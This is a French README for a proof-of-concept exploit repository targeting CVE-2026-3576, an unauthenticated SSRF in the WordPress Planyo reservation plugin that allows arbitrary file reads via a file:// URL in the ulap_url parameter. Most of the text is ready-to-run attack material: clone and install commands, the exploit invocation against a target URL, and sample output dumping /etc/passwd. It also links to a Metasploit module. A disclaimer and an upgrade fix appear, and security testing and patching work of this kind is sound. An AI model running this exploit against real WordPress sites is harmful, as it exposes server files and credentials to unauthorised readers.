
Exploit de preuve de concept pour CVE-2026-3576
Ce dépôt contient un exploit Proof of Concept (PoC) basé sur Python pour CVE-2026-3576. Il est également disponible dans Exploit-DB ici.
J'ai également développé un module Metasploit pour cet exploit, disponible ici.
Ce projet est fourni à des fins éducatives et pour des tests de sécurité autorisés uniquement. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester.
Une vulnérabilité de type Server Side Request Forgery (SSRF) existe dans le plugin Planyo Online Reservation System de WordPress avant la version 3.1. Elle permet à un attaquant non authentifié de fournir une URL file:// via le paramètre ulap_url, entraînant un accès arbitraire aux fichiers.
Une analyse détaillée avec analyse du code source et démonstration de l'exploit est disponible sur mon blog Medium.
| Composant | Version |
|---|---|
| Plugin vulnérable | <=3.0 |
| Plugin corrigé | 3.1 |
git clone https://github.com/anirbala98/CVE-2026-3576.git
cd CVE-2026-3576/
pip install -r requirements.txt
python exploit.py <base_url> -f <file location> --disable-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
[*] Checking if target is vulnerable...
[+] Version found: 2.9
[+] Target is vulnerable
[*] Attempting to read arbitrary file...
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
Mettez à jour le plugin vers la version 3.1.